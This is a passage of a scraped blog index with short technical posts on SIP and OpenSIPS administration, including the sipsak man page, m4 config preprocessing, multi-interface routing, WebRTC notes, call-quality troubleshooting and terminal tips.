-t, --trash-chars NUMBER This parameter specifies the maximum of trashed characters in the randtrash mode. If omitted NUMBER will be set to the length of the request. -T, --traceroute-mode This activates the traceroute mode. This mode works like the well known traceroute(8) command expect that not the number of network hops are counted rather the number of server on the way to the destination user. Also the round trip time of each request is printed out, but due to a limitation within the sip protocol the identity (IP or name) can only deter‐ mined and printed out if the response from the server contains a warning header field. In this mode on each outgoing request the value of the Max-Forwards header field is increased, starting with one. The maximum of the Max-Forwards header will 255 if no other value is given by the -m parameter. Any other response than 483 or 1xx are treated as a final response and will terminate this mode. -u, --auth-username STRING Use the given STRING as username value for the authentication (different account and authentication username). -U, --usrloc-mode This activates the usrloc mode. Without the -I or the -M option, this only registers users at a registrar. With one of the above options the previous registered user will also be probed ether with a simulated call flow (invite, 200, ack) or with an instant message (message, 200). One password for all users accounts within the usrloc test can be given with the -a option. An user name is mandatory for this mode in the -s parameter. The number starting from the -b parameter to the -e parameter is appended the user name. If the -b and the -e parameter are omitted, only one runs with the given user‐ name, but without append number to the usernames is done. -v, --verbose This parameter increases the output verbosity. No -v means nearly no output except in traceroute and error messages. The maximum of three v\u0026#39;s prints out the content of all packets received and sent. 
-V, --version Prints out the name and version number of sipsak and the options which were compiled into the binary. -w, --extract-ip Activates the extraction of the IP or hostname from the Warning header field. -W, --nagios-warn NUMBER Return Nagios warn exit code (1) if the number of retransmissions before success was above the given number. -x, --expires NUMBER Sets the value of the Expires header to the given number. -z, --remove-bindings Activates the randomly removing of old bindings in the usrloc mode. How many per cent of the bindings will be removed, is determined by the USRLOC_REMOVE_PERCENT define within the code (set it before compilation). Multiple removing of bind‐ ings is possible, and cannot be prevented. -Z, --timer-t1 Sets the amount of milliseconds for the SIP timer T1. It determines the length of the gaps between two retransmissions of a request on a unreliable transport. Default value is 500 if not changed via the configure option --enable-timeout. RETURN VALUES The return value 0 means that a 200 was received. 1 means something else then 1xx or 2xx was received. 2 will be returned on local errors like non resolvable names or wrong options combination. 3 will be returned on remote errors like socket errors (e.g. icmp error), redirects without a contact header or simply no answer (timeout). If the -N option was given the return code will be 2 in case of any (local or remote) error. 1 in case there have been retrans‐ missions from sipsak to the server. And 0 if there was no error at all. CAUTION Use sipsak responsibly. Running it in any of the stress modes puts substantial burden on network and server under test. EXAMPLES sipsak -vv -s sip:nobody@foo.bar displays received replies. sipsak -T -s sip:nobody@foo.bar traces SIP path to nobody. sipsak -U -C sip:me@home -x 3600 -a password -s sip:myself@company inserts forwarding from work to home for one hour. 
sipsak -f bye.sip -g \u0026#39;!FTAG!345.af23!TTAG!1208.12!\u0026#39; -s sip:myproxy reads the file bye.sip, replaces $FTAG$ with 345.af23 and $TTAG$ with 1208.12 and finally send this message to myproxy LIMITATIONS / NOT IMPLEMENTED Many servers may decide NOT to include SIP \u0026#34;Warning\u0026#34; header fields. Unfortunately, this makes displaying IP addresses of SIP servers in traceroute mode impossible. IPv6 is not supported. Missing support for the Record-Route and Route header. BUGS sipsak is only tested against the SIP Express Router (ser) though their could be various bugs. Please feel free to mail them to the author. AUTHOR Nils Ohlmeier \u0026lt;nils at sipsak dot org\u0026gt; SEE ALSO traceroute(8) ","permalink":"https://wdd.js.org/opensips/tools/sipsak/","summary":"sipsak is a command line tool which can send simple requests to a SIP server. It can run additional tests on a SIP server which are useful for admins and developers of SIP environments.\nhttps://github.com/nils-ohlmeier/sipsak\n安装 apt-get install sipsak 发送options sipsak -vv -p 192.168.2.63:5060 -s sip:8001@test.cc man SIPSAK(1) User Manuals SIPSAK(1) NAME sipsak - a utility for various tests on sip servers and user agents SYNOPSIS sipsak [-dFGhiILnNMRSTUVvwz] [-a PASSWORD ] [-b NUMBER ] [-c SIPURI ] [-C SIPURI ] [-D NUMBER ] [-e NUMBER ] [-E STRING ] [-f FILE ] [-g STRING ] [-H HOSTNAME ] [-j STRING ] [-J STRING ] [-l PORT ] [-m NUMBER ] [-o NUMBER ] [-p HOSTNAME ] [-P NUMBER ] [-q REGEXP ] [-r PORT ] [-t NUMBER ] [-u STRING ] [-W NUMBER ] [-x NUMBER ] -s SIPURI DESCRIPTION sipsak is a SIP stress and diagnostics utility.","title":"sipsak"},{"content":"以前iTerm2有个很贴心的功能,鼠标向下滚动时,相关命令的输出也会自动向下。\n但是不知道最近是升级系统还是升级iTerm2的原因,这个功能实现不了。😭😭😭😭😭😭😭\n例如用vim打开一个大文件,或者使用man去查看一个命令的介绍文档时。如果要想向下滚动命令的输出内容。只能按j或者按空格或者回车。然而按键虽然精确,却没有用触摸板滚动来得爽。\n为了让vim能够接受鼠标向下滚动功能,我也曾设置了 set mouse=a 这个设置虽然可以用触摸板来向下滚屏了,但是也出现了意想不到的问题。\n然后我就去研究iTerm2的配置,发现关于鼠标的配置中,有一个 Scroll wheel sends arrow keys when in alternate screen mode , 
把这个值设置为Yes。那么无论Vim, 还是man命令,都可以用触摸板去滚动屏幕了。\n","permalink":"https://wdd.js.org/posts/2020/07/gon16g/","summary":"以前iTerm2有个很贴心的功能,鼠标向下滚动时,相关命令的输出也会自动向下。\n但是不知道最近是升级系统还是升级iTerm2的原因,这个功能实现不了。😭😭😭😭😭😭😭\n例如用vim打开一个大文件,或者使用man去查看一个命令的介绍文档时。如果要想向下滚动命令的输出内容。只能按j或者按空格或者回车。然而按键虽然精确,却没有用触摸板滚动来得爽。\n为了让vim能够接受鼠标向下滚动功能,我也曾设置了 set mouse=a 这个设置虽然可以用触摸板来向下滚屏了,但是也出现了意想不到的问题。\n然后我就去研究iTerm2的配置,发现关于鼠标的配置中,有一个 Scroll wheel sends arrow keys when in alternate screen mode , 把这个值设置为Yes。那么无论Vim, 还是man命令,都可以用触摸板去滚动屏幕了。","title":"iTerm2 使用触摸板向下滚动命令输出"},{"content":"Mac上的netstat和Linux上的有不少的不同之处。\n在Linux上常使用\nLinux Mac netstat -nulp netstat -nva -p udp netstat -ntlp netstat -nva -p tcp 注意,在Mac上netstat的-n和Linux上的含义相同\n","permalink":"https://wdd.js.org/posts/2020/07/hingbv/","summary":"Mac上的netstat和Linux上的有不少的不同之处。\n在Linux上常使用\nLinux Mac netstat -nulp netstat -nva -p udp netstat -ntlp netstat -nva -p tcp 注意,在Mac上netstat的-n和Linux上的含义相同","title":"mac上netstat命令"},{"content":"opensips在多实例时,会有一些数据同步策略的问题。\n~\n","permalink":"https://wdd.js.org/opensips/ch5/db-mode/","summary":"opensips在多实例时,会有一些数据同步策略的问题。\n~","title":"[todo] db_mode调优"},{"content":"相比于kamailio的脚本的预处理能力,opensips的脚本略显单薄。OpenSIPS官方也认识到了这一点,但是也并未打算提高这部分能力。因为OpenSIPS是想将预处理交给这方面的专家,也就是大名鼎鼎的m4(当然,你可能根本不知道m4是啥)。\n举例来说 我们看一下opensips自带脚本中的一小块。 里面就有三个要配置的地方\n这个listen的地址: listen=udp:127.0.0.1:5060 数据库地址的配置:modparam(\u0026ldquo;usrloc\u0026rdquo;, \u0026ldquo;db_url\u0026rdquo;, \u0026ldquo;dbdriver://username:password@dbhost/dbname\u0026rdquo;) 数据库地址的配置:modparam(\u0026ldquo;acc\u0026rdquo;, \u0026ldquo;db_url\u0026rdquo;, \u0026ldquo;mysql://user:password@localhost/opensips\u0026rdquo;) auto_aliases=no listen=udp:127.0.0.1:5060 # CUSTOMIZE ME mpath=\u0026#34;/usr/local//lib/opensips/modules/\u0026#34; loadmodule \u0026#34;usrloc.so\u0026#34; modparam(\u0026#34;usrloc\u0026#34;, \u0026#34;db_url\u0026#34;, \u0026#34;dbdriver://username:password@dbhost/dbname\u0026#34;) modparam(\u0026#34;acc\u0026#34;, \u0026#34;early_media\u0026#34;, 0) 
modparam(\u0026#34;acc\u0026#34;, \u0026#34;report_cancels\u0026#34;, 0) modparam(\u0026#34;acc\u0026#34;, \u0026#34;detect_direction\u0026#34;, 0) modparam(\u0026#34;acc\u0026#34;, \u0026#34;db_url\u0026#34;, \u0026#34;mysql://user:password@localhost/opensips\u0026#34;) 随着脚本代码的增多,各种配置往往越来越多。真实脚本里,配置的地方远远不止三处!\n你开发了OpenSIPS的脚本,但是真正部署服务的可能是其他人。那么其他人拿到你的脚本的时候,他们怎么知道要改哪些地方呢,难道要搜索一下,所有出现#CUSTOMIZE ME的地方就是需要配置的? 难道他们每次部署一个服务,就要改一遍脚本的内容? 改错了谁负责?\n如果你不想被运维人员在背后骂娘,就不要把配置性的数据写死到脚本里!\n如果你不想在打游戏的时候被运维人员打电话问这个配置出错应该怎么解决,就不要把配置型数据写死到脚本里!\n** 那么,你就需要用到M4**\n什么是M4? M4是一种宏语言,如果你不清楚什么是宏,你就可以把M4想象成一种字符串替换的工具。\n如何安装M4? 大部分Linux上都已经默认安装了m4, 你可以用m4 --version检查一下m4是否已经存在。\nm4 --version Copyright © 2021 Free Software Foundation, Inc. GPLv3+ 许可证: GNU 通用公共许可证第三版或更高版本 \u0026lt;https://gnu.org/licenses/gpl.html\u0026gt;。 这是自由软件: 您可自由更改并重新分发它。 在法律所允许的范围内,不附带任何担保条款。 如果不存在的话,可以用对应常用的包管理工具来安装,例如\napt-get install m4 能否举个m4例子? hello-world.m4\ndefine(`hello_world\u0026#39;, `你好,世界\u0026#39;) 小王说: hello_world 然后执行: m4 hello-world.m4\n小王说: 你好,世界 效果就是 hello_world这个字符串,被我们定义的字符串给替换了。\n为什么要做预处理? 
我管理过的OpenSIPS脚本,最长的大概有1500行左右。刚开始接手的时候,我花了很长时间才理清脚本的功能。\n这个脚本存在的问题是:\n大段的逻辑都集中在请求路由中,功能比较缠绕,很容易改动一个地方,导致不可预测的问题 配置性的变量和脚本融合在一起,脚本迁移时,要改动的地方比较多,容易出错 某些环境需要某些功能,某些环境又不需要某些功能,很难做到兼容,结果就导致脚本的版本太多,难以维护 处理的目标\n将比较大的请求路由,按照功能划分为多个子路由,专注处理功能内部的事情,做到高内聚,低耦合。可以使用m4的include指令,将多个文件引入到一个文件中。其实OpenSIPS本身也有类似的指令,include_file,但是这个指令并不会在运行前生成一个统一的目标文件,有时候出错,不好排查问题出现的代码行。另外Include的文件太多,也不好维护。 将配置性变量,定义成m4的宏,由m4负责统一的宏展开。配置文件可以单独拿出来,也可以由m4的命令行参数传入。 关于不同环境的差异化编译,可以使用m4的条件语句。例如当某个宏被定义时展开某个语句,或者某个宏的值等于某个值后,再include某个文件。这样就可以做到条件展开和条件引入。 ","permalink":"https://wdd.js.org/opensips/ch5/m4/","summary":"相比于kamailio的脚本的预处理能力,opensips的脚本略显单薄。OpenSIPS官方也认识到了这一点,但是也并未打算提高这部分能力。因为OpenSIPS是想将预处理交给这方面的专家,也就是大名鼎鼎的m4(当然,你可能根本不知道m4是啥)。\n举例来说 我们看一下opensips自带脚本中的一小块。 里面就有三个要配置的地方\n这个listen的地址: listen=udp:127.0.0.1:5060 数据库地址的配置:modparam(\u0026ldquo;usrloc\u0026rdquo;, \u0026ldquo;db_url\u0026rdquo;, \u0026ldquo;dbdriver://username:password@dbhost/dbname\u0026rdquo;) 数据库地址的配置:modparam(\u0026ldquo;acc\u0026rdquo;, \u0026ldquo;db_url\u0026rdquo;, \u0026ldquo;mysql://user:password@localhost/opensips\u0026rdquo;) auto_aliases=no listen=udp:127.0.0.1:5060 # CUSTOMIZE ME mpath=\u0026#34;/usr/local//lib/opensips/modules/\u0026#34; loadmodule \u0026#34;usrloc.so\u0026#34; modparam(\u0026#34;usrloc\u0026#34;, \u0026#34;db_url\u0026#34;, \u0026#34;dbdriver://username:password@dbhost/dbname\u0026#34;) modparam(\u0026#34;acc\u0026#34;, \u0026#34;early_media\u0026#34;, 0) modparam(\u0026#34;acc\u0026#34;, \u0026#34;report_cancels\u0026#34;, 0) modparam(\u0026#34;acc\u0026#34;, \u0026#34;detect_direction\u0026#34;, 0) modparam(\u0026#34;acc\u0026#34;, \u0026#34;db_url\u0026#34;, \u0026#34;mysql://user:password@localhost/opensips\u0026#34;) 随着脚本代码的增多,各种配置往往越来越多。真实脚本里,配置的地方远远不止三处!\n你开发了OpenSIPS的脚本,但是真正部署服务的可能是其他人。那么其他人拿到你的脚本的时候,他们怎么知道要改哪些地方呢,难道要搜索一下,所有出现#CUSTOMIZE ME的地方就是需要配置的? 难道他们每次部署一个服务,就要改一遍脚本的内容? 
改错了谁负责?\n如果你不想被运维人员在背后骂娘,就不要把配置性的数据写死到脚本里!\n如果你不想在打游戏的时候被运维人员打电话问这个配置出错应该怎么解决,就不要把配置型数据写死到脚本里!\n** 那么,你就需要用到M4**\n什么是M4? M4是一种宏语言,如果你不清楚什么是宏,你就可以把M4想象成一种字符串替换的工具。\n如何安装M4? 大部分Linux上都已经默认安装了m4, 你可以用m4 --version检查一下m4是否已经存在。\nm4 --version Copyright © 2021 Free Software Foundation, Inc. GPLv3+ 许可证: GNU 通用公共许可证第三版或更高版本 \u0026lt;https://gnu.org/licenses/gpl.html\u0026gt;。 这是自由软件: 您可自由更改并重新分发它。 在法律所允许的范围内,不附带任何担保条款。 如果不存在的话,可以用对应常用的包管理工具来安装,例如\napt-get install m4 能否举个m4例子? hello-world.","title":"使用m4增强opensips.cfg脚本预处理能力"},{"content":"There are scenarios where you need OpenSIPS to route SIP traffic across more than one IP interface. Such a typical scenario is where OpenSIPS is required to perform bridging. The bridging may be between different IP networks (like public versus private, IPv4 versus IPv6) or between different transport protocols for SIP (like UDP versus TCP versus TLS).So, how do we switch to a different outbound interface in OpenSIPS ?\nAuto detection OpenSIPS has a built in automatic way of picking up the right outbound interface, the so called “Multi homed” support or shortly “mhomed”, controlled by the mhomed core parameter.The auto detection is done based on the destination IP of the SIP message. OpenSIPS will ‘query’ the kernel routing table to see which interface (on the server) is able to route to the needed destination IP.\nExample If we have an OpenSIPS listening on 1.2.3.4 public interface and 10.0.0.4 private interface and we need to send the SIP message to 10.0.0.100, the kernel will indicate that 10.0.0.100 is reachable/routable only via 10.0.0.4, so OpenSIPS will use that listener.\nAdvantages This a very easy way to achieve multi-interface routing, without any extra scripting logic. 
You just have to switch a single option and it simply works.\nDisadvantages First of all there is performance penalty here as each time a SIP message is sent out OpenSIPS will have to query the kernel for the right outbound interface.Also there are some limitation – as this auto detection is based on the kernel routing table, this approach can be used only when routing between different types of networks like private versus public or IPv4 versus IPv6. It cannot be used for switching between different SIP transport protocols.Even more, there is another limitation here – you need to correlate the kernel IP routing table with the listeners you have in OpenSIPS, otherwise you may end up in a situation where the kernel indicates as outbound interface an IP that it is not configured as listener in OpenSIPS!\nManual selection An alternative is to explicitly indicate to OpenSIPS what the outbound interface should be, based on the logic from the routing script. Like if my routing logic says that the call is to be sent to an end-point and I know that all my end-points are on the public network, then I can manually indicate OpenSIPS to use the listener on the public network. Or if my routing logic says that the call goes to a media server located in a private network, then I will instruct OpenSIPS to use the private listener.How do you do this? You can indicate the outbound interface/socket by “forcing the send socket” with the $fs variable.As the send socket description also contains indication for the transport protocol, this approach can be used for switching between different SIP transport protocols:\n# switch from TCP to UDP, preserving the IP if ($proto == \u0026#34;TCP\u0026#34;) $fs = \u0026#34;udp:\u0026#34; + $Ri + \u0026#34;:5060\u0026#34;; Manually setting the outbound interface is usually done only for the initial requests (without the To header “;tag=” parameter). Why? 
As you have to anchor the dialog into your OpenSIPS (otherwise the sequential requests will not be routed in bridging mode), you will do either record_route() or topology_hiding(). These two ways of anchoring dialogs in OpenSIPS guarantee that all sequential requests will follow the same interface switching / bridging as the initial request. For example, if you do the interface switch at INVITE time, there is no need for additional scripting for in-dialog requests (ACK, re-INVITE, BYE, etc.). Shortly, any custom interface handling is to be done only for the initial requests.\nExample Assuming the end-points are on the public interface and the media servers are in the private network, let’s see how the logic should be. But first, a useful hint: if your routing is based on lookup(“location”), there is no need to do manual setting of the outbound interface, as the lookup() function will do this for you – it will automatically force as outbound interface the interface the corresponding REGISTER was received on ;).\n# is it a call to a media service (format *33xxxxx) ? if ($rU=~\u0026#34;^*33[0-9]+$\u0026#34;) { $fs = \u0026#34;udp:10.0.0.100:5060\u0026#34;; route(to_media); exit; } Advantages This is a very rigorous way of controlling the interface switching in your OpenSIPS script, being able to cover all cases of network or protocol switching. Also, this adds zero performance penalty!\nDisadvantages You need to do some extra scripting and to correlate your SIP routing logic with the IP/transport switching logic. Nevertheless, it is very easy to do – just set a variable, so it will not pollute your script.\nConclusions Each approach has some clear advantages – while the auto-detection is very simple to use for some simple scenarios, the manual selection is more powerful and complex but needs some extra scripting and SIP understanding. If you want to learn more, join us for the upcoming OpenSIPS Bootcamp training session and become a skillful OpenSIPS user!
:).\n原文地址:https://blog.opensips.org/2018/09/04/sip-bridging-over-multiple-interfaces/\n","permalink":"https://wdd.js.org/opensips/blog/mutltiple-interface/","summary":"There are scenarios where you need OpenSIPS to route SIP traffic across more than one IP interface. Such a typical scenario is where OpenSIPS is required to perform bridging. The bridging may be between different IP networks (like public versus private, IPv4 versus IPv6) or between different transport protocols for SIP (like UDP versus TCP versus TLS).So, how do we switch to a different outbound interface in OpenSIPS ?\nAuto detection OpenSIPS has a built in automatic way of picking up the right outbound interface, the so called “Multi homed” support or shortly “mhomed”, controlled by the mhomed core parameter.","title":"SIP bridging over multiple interfaces"},{"content":"curl ip.sb curl cip.cc ","permalink":"https://wdd.js.org/posts/2020/07/bh7hy0/","summary":"curl ip.sb curl cip.cc ","title":"获取本机外部公网IP"},{"content":"标准文档 WebRTC https://w3c.github.io/webrtc-pc/ MediaStream https://www.w3.org/TR/mediacapture-streams/ 实现接口 MediaStream: 获取媒体流,例如从用户的摄像机或者麦克风 RTCPeerConnection: 音频或者视频呼叫,以及加密和带宽管理 RTCDataChannel: 端到端的数据交互 WebRTC架构 架构图颜色标识说明:\n紫色部分是Web开发者API层 蓝色实线部分是面向浏览器厂商的API层 蓝色虚线部分浏览器厂商可以自定义实现 WebRTC有三个模块:\nVoice Engine(音频引擎) Voice Engine包含iSAC/iLBC Codec(音频编解码器,前者是针对宽带和超宽带,后者是针对窄带) NetEQ for voice(处理网络抖动和语音包丢失) Echo Canceler(回声消除器)/ Noise Reduction(噪声抑制) Video Engine(视频引擎) VP8 Codec(视频图像编解码器) Video jitter buffer(视频抖动缓冲器,处理视频抖动和视频信息包丢失) Image enhancements(图像质量增强) Transport SRTP(安全的实时传输协议,用以音视频流传输) Multiplexing(多路复用) P2P,STUN+TURN+ICE(用于NAT网络和防火墙穿越的) 除此之外,安全传输可能还会用到DTLS(数据报安全传输),用于加密传输和密钥协商 整个WebRTC通信是基于UDP的 WebRTC底层协议 WebRTC 核心的协议都是在右侧基于 UDP 基础上搭建起来的。\n其中,ICE、STUN、TURN 用于内网穿透, 解决了获取与绑定外网映射地址,以及 keep alive 机制\nDTLS 用于对传输内容进行加密,可以看做是 UDP 版的 TLS。由于 WebRTC 对安全比较重视,这一层是必须的。所有WebRTC组件都必须加密,并且其JavaScript API只能用于安全源(HTTPS或本地主机)。信令机制并不是由WebRTC标准定义的,所以您必须确保使用安全协议。 SRTP 与 SRTCP 是对媒体数据的封装与传输控制协议 SCTP 
是流控制传输协议,提供类似 TCP 的特性,SCTP 可以基于 UDP 上构建,在 WebRTC 里是在 DTLS 协议之上 RTCPeerConnection 用来建立和维护端到端连接,并提供高效的音视频流传输 RTCDataChannel 用来支持端到端的任意二进制数据传输 WebRTC 协议栈解释\nICE:互动式连接建立(RFC 5245) STUN:用于NAT的会话遍历实用程序(RFC 5389) TURN:在NAT周围使用继电器进行遍历(RFC 5766) SDP:会话描述协议(RFC 4566) DTLS:数据报传输层安全性(RFC 6347) SCTP:流控制传输协议(RFC 4960) SRTP:安全实时传输协议(RFC 3711) ","permalink":"https://wdd.js.org/fe/webrtc-notes/","summary":"标准文档 WebRTC https://w3c.github.io/webrtc-pc/ MediaStream https://www.w3.org/TR/mediacapture-streams/ 实现接口 MediaStream: 获取媒体流,例如从用户的摄像机或者麦克风 RTCPeerConnection: 音频或者视频呼叫,以及加密和带宽管理 RTCDataChannel: 端到端的数据交互 WebRTC架构 架构图颜色标识说明:\n紫色部分是Web开发者API层 蓝色实线部分是面向浏览器厂商的API层 蓝色虚线部分浏览器厂商可以自定义实现 WebRTC有三个模块:\nVoice Engine(音频引擎) Voice Engine包含iSAC/iLBC Codec(音频编解码器,前者是针对宽带和超宽带,后者是针对窄带) NetEQ for voice(处理网络抖动和语音包丢失) Echo Canceler(回声消除器)/ Noise Reduction(噪声抑制) Video Engine(视频引擎) VP8 Codec(视频图像编解码器) Video jitter buffer(视频抖动缓冲器,处理视频抖动和视频信息包丢失) Image enhancements(图像质量增强) Transport SRTP(安全的实时传输协议,用以音视频流传输) Multiplexing(多路复用) P2P,STUN+TURN+ICE(用于NAT网络和防火墙穿越的) 除此之外,安全传输可能还会用到DTLS(数据报安全传输),用于加密传输和密钥协商 整个WebRTC通信是基于UDP的 WebRTC底层协议 WebRTC 核心的协议都是在右侧基于 UDP 基础上搭建起来的。\n其中,ICE、STUN、TURN 用于内网穿透, 解决了获取与绑定外网映射地址,以及 keep alive 机制\nDTLS 用于对传输内容进行加密,可以看做是 UDP 版的 TLS。由于 WebRTC 对安全比较重视,这一层是必须的。所有WebRTC组件都必须加密,并且其JavaScript API只能用于安全源(HTTPS或本地主机)。信令机制并不是由WebRTC标准定义的,所以您必须确保使用安全协议。 SRTP 与 SRTCP 是对媒体数据的封装与传输控制协议 SCTP 是流控制传输协议,提供类似 TCP 的特性,SCTP 可以基于 UDP 上构建,在 WebRTC 里是在 DTLS 协议之上 RTCPeerConnection 用来建立和维护端到端连接,并提供高效的音视频流传输 RTCDataChannel 用来支持端到端的任意二进制数据传输 WebRTC 协议栈解释","title":"Webrtc Notes"},{"content":"通话质量差,一般可能以下因素有关。\n媒体服务器或者媒体代理服务器CPU, 内存异常 通信网络差 中继或者网关送过来的本来音质就不好。 解决思路:\n这个需要监控媒体服务器或者媒体代理CPU,内存是否正常 也可以在媒体代理上用tupdump抓包,然后用wireshark分析 调听服务端的录音,看看服务端录音是否也存在音质差的问题 ","permalink":"https://wdd.js.org/opensips/ch7/poor-quality/","summary":"通话质量差,一般可能以下因素有关。\n媒体服务器或者媒体代理服务器CPU, 内存异常 通信网络差 中继或者网关送过来的本来音质就不好。 解决思路:\n这个需要监控媒体服务器或者媒体代理CPU,内存是否正常 也可以在媒体代理上用tupdump抓包,然后用wireshark分析 调听服务端的录音,看看服务端录音是否也存在音质差的问题 
","title":"通话质量差"},{"content":" 这个问题很大可能和和SDP没有正确修改有关。需要排查SIP信令的sdp地址是否正确。 防火墙策略问题:有的网络允许udp出去,但是不允许udp进来。需要设置防火墙策略。 udp端口范围太小。一般一个通话需要占用4个udp端口。如果开放的udp端口太少,在通话达到一定数量后,就会出现一部分呼叫没有可用端口。 用户设备的问题。例如用户的电脑声卡或者扬声器出现问题。 由于网络的复杂性,还有很多可能 一般遇到这个问题,可以按照如下的思路排查:\n服务端有录音功能的,可以先在服务端听录音,看看服务端录音里是否正常。一般来说有四种情况。 两方的录音都没有 主叫方有,被叫方没有 被叫方有,主叫方没有 主被叫都有。但是就是一方听不到另一方。 通过排查服务端的录音,就可以大致知道到底是AB两个leg, 每个leg上的语音流收发的情况。\n从信令的的sdp中分析,这个需要一定的SIP协议的分析能力。有些时候,sdp里面的媒体地址不正确,也会导致媒体流无法正常首发。 NAT策略。NAT一般有四种,用的比较多的是端口限制型。这种NAT要求外网流量在进入NAT内部时,必需先有内部的流量出去。当内部流量出去之后,这个NAT洞才会出现,外部的流量才能从这个洞进入。如果NAT内部设备一直不发送rtp包,那么外部的流量即使进来,也会被防火墙拦截掉。 无论是运维人员还是开发人员,在遇到媒体流问题时,一定要先搞清楚整个软交换的网络拓扑架构。否则只能南辕北辙。 sngrep -cr, 加上r这个参数,可以实时观察媒体流的流动情况。是个非常好的功能。但是对于那种加密的媒体流,sngrep是抓不到的,这点要注意。常见的WebRTC的媒体流就是加密的。 最终如果还是解决不了,那么只能祭出最后的杀器:tcpdump + wireshark。服务端抓包的话,虽然sngrep可以抓包,但是比较浪费内存还可能会出现丢包。最好用tcpdump抓包成文件,然后在wireshark上分析。 ","permalink":"https://wdd.js.org/opensips/ch7/one-leg-audio/","summary":" 这个问题很大可能和和SDP没有正确修改有关。需要排查SIP信令的sdp地址是否正确。 防火墙策略问题:有的网络允许udp出去,但是不允许udp进来。需要设置防火墙策略。 udp端口范围太小。一般一个通话需要占用4个udp端口。如果开放的udp端口太少,在通话达到一定数量后,就会出现一部分呼叫没有可用端口。 用户设备的问题。例如用户的电脑声卡或者扬声器出现问题。 由于网络的复杂性,还有很多可能 一般遇到这个问题,可以按照如下的思路排查:\n服务端有录音功能的,可以先在服务端听录音,看看服务端录音里是否正常。一般来说有四种情况。 两方的录音都没有 主叫方有,被叫方没有 被叫方有,主叫方没有 主被叫都有。但是就是一方听不到另一方。 通过排查服务端的录音,就可以大致知道到底是AB两个leg, 每个leg上的语音流收发的情况。\n从信令的的sdp中分析,这个需要一定的SIP协议的分析能力。有些时候,sdp里面的媒体地址不正确,也会导致媒体流无法正常首发。 NAT策略。NAT一般有四种,用的比较多的是端口限制型。这种NAT要求外网流量在进入NAT内部时,必需先有内部的流量出去。当内部流量出去之后,这个NAT洞才会出现,外部的流量才能从这个洞进入。如果NAT内部设备一直不发送rtp包,那么外部的流量即使进来,也会被防火墙拦截掉。 无论是运维人员还是开发人员,在遇到媒体流问题时,一定要先搞清楚整个软交换的网络拓扑架构。否则只能南辕北辙。 sngrep -cr, 加上r这个参数,可以实时观察媒体流的流动情况。是个非常好的功能。但是对于那种加密的媒体流,sngrep是抓不到的,这点要注意。常见的WebRTC的媒体流就是加密的。 最终如果还是解决不了,那么只能祭出最后的杀器:tcpdump + wireshark。服务端抓包的话,虽然sngrep可以抓包,但是比较浪费内存还可能会出现丢包。最好用tcpdump抓包成文件,然后在wireshark上分析。 
","title":"一方听不到另外一方的声音"},{"content":"在通话接近30秒时,呼叫自动挂断。\n有很大的可能和丢失了ACK有关。这个需要用sngrep去抓包看SIP时序图来确定是否是ACK丢失。\n丢失ACK的原因很大可能是NAT没有处理好,或者是网络协议不匹配等等。\n","permalink":"https://wdd.js.org/opensips/ch7/30-seconds-drop/","summary":"在通话接近30秒时,呼叫自动挂断。\n有很大的可能和丢失了ACK有关。这个需要用sngrep去抓包看SIP时序图来确定是否是ACK丢失。\n丢失ACK的原因很大可能是NAT没有处理好,或者是网络协议不匹配等等。","title":"30秒自动挂断"},{"content":"exec user process caused \u0026#34;no such file or diectory\u0026#34; 解决方案: 将镜像构建的 Dockerfile ENTRYPOINT [\u0026quot;/run.sh\u0026quot;] 改为下面的\nENTRYPOINT [\u0026#34;sh\u0026#34;,\u0026#34;/run.sh\u0026#34;] 其实就是加了个sh\n","permalink":"https://wdd.js.org/posts/2020/07/docker-exec-user-process/","summary":"exec user process caused \u0026#34;no such file or diectory\u0026#34; 解决方案: 将镜像构建的 Dockerfile ENTRYPOINT [\u0026quot;/run.sh\u0026quot;] 改为下面的\nENTRYPOINT [\u0026#34;sh\u0026#34;,\u0026#34;/run.sh\u0026#34;] 其实就是加了个sh","title":"exec user process caused no such file or diectory"},{"content":"function report(msg:string){ var msg = new Image() msg.src = `/report?log=${msg}` } report ","permalink":"https://wdd.js.org/posts/2020/07/koow4y/","summary":"function report(msg:string){ var msg = new Image() msg.src = `/report?log=${msg}` } report ","title":"使用image标签上传日志"},{"content":"python Flask框架报错。刚开始我只关注了这个报错,没有看到这个报错上上面还有一个报错\nModuleNotFoundError: No module named \u0026#39;http.client\u0026#39;; \u0026#39;http\u0026#39; is not a package 实际上问题的关键其实是 'http' is not a package , 为什么会有这个报错呢?\n其实因为我自己在项目目录里新建一个叫做http.py的文件,这个文件名和python的标准库重名了,就导致了后续的一系列的问题。\n问题总结 文件名一定不要和某些标准库的文件名相同 排查问题的时候,一定要首先排查最先出现问题的点 ","permalink":"https://wdd.js.org/posts/2020/07/ncigfk/","summary":"python Flask框架报错。刚开始我只关注了这个报错,没有看到这个报错上上面还有一个报错\nModuleNotFoundError: No module named \u0026#39;http.client\u0026#39;; \u0026#39;http\u0026#39; is not a package 实际上问题的关键其实是 'http' is not a package , 为什么会有这个报错呢?\n其实因为我自己在项目目录里新建一个叫做http.py的文件,这个文件名和python的标准库重名了,就导致了后续的一系列的问题。\n问题总结 文件名一定不要和某些标准库的文件名相同 排查问题的时候,一定要首先排查最先出现问题的点 ","title":"ModuleNotFoundError: 
No module named 'SocketServer'"},{"content":"iTerm我已经使用了很长时间了,总体各方面的特点都非常好,但是有几个地方也是让我苦恼的地方。\ntab 页面的标题会根据执行的命令或者路径发生变化,如果你开了七八个ssh远程,有时候很难区分这个tab页面到底是连接的哪台机器。 如果你有十几个机器需要连接,你不可能手动输入ssh root@ip地址的方式去连接,太多了记不住。 如何维护多个远程host? 使用profile维护多个远程host, 每个profile对应连接到一台机器。profile name填入该host的名字。\n注意右边的Command, Send text at start的输入框,这个输入框,就是要执行的ssh指令,里面包含了远程host的地址。\n然后你就可以在Profils的菜单中选择一个profile进行连接了。\n如何让tab页面的标题不改变? 一定不要勾选Applications in terminal may change the title, 默认这项是勾选的。 Ttile一定要选择Name, badge的妙用? 如果标签页的tab的名称还不够强调当前tab页面是连接哪个标签页面的,你可以用用Badge去强调一下。\n","permalink":"https://wdd.js.org/posts/2020/06/ba84a7/","summary":"iTerm我已经使用了很长时间了,总体各方面的特点都非常好,但是有几个地方也是让我苦恼的地方。\ntab 页面的标题会根据执行的命令或者路径发生变化,如果你开了七八个ssh远程,有时候很难区分这个tab页面到底是连接的哪台机器。 如果你有十几个机器需要连接,你不可能手动输入ssh root@ip地址的方式去连接,太多了记不住。 如何维护多个远程host? 使用profile维护多个远程host, 每个profile对应连接到一台机器。profile name填入该host的名字。\n注意右边的Command, Send text at 